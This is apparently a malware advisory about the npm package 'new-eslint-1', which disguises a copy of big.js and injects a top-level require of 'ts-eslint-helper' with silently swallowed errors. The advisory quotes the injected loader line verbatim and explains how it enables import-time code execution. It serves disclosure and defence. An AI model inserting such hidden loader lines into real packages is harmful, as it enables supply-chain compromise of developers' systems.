MAL-2026-6225
Malicious code in new-eslint-1 (npm)
Details
## Source: amazon-inspector (7752e7f074edbf8521da2ee0b7c68c28a2f76d86576138df8f18e08aaa3a5c38)

Package is published as 'new-eslint-1' but its package.json description, README, repository URL (MikeMcl/big.js), and source are a verbatim copy of big.js v7.0.1; there is no ESLint functionality. Two lines have been injected at module top level in both big.js and big.mjs (lines 605-606):

`const helper = require("ts-eslint-helper"); helper.from_str().then(e => e).catch(e => { });`

Because package.json declares `"main": "big.js"`, any `require('new-eslint-1')` synchronously loads the external `ts-eslint-helper` package and invokes `helper.from_str()` in the consumer's Node process, with errors silently swallowed. The required module name (`ts-eslint-helper`) does not match the only declared dependency (`eslint-helper-1@5.0.4`), so the loader is designed to fire when `ts-eslint-helper` resolves transitively or via a sibling install in a monorepo / polluted registry, and to fail silently otherwise, hiding the attempt from observers.

This combines namespace deception (eslint-themed name + big.js disguise) with import-time arbitrary code execution under the control of whoever publishes ts-eslint-helper.
Affected packages
No fixed version published yet for new-eslint-1 (npm). Pin to a known-safe version or switch to an alternative.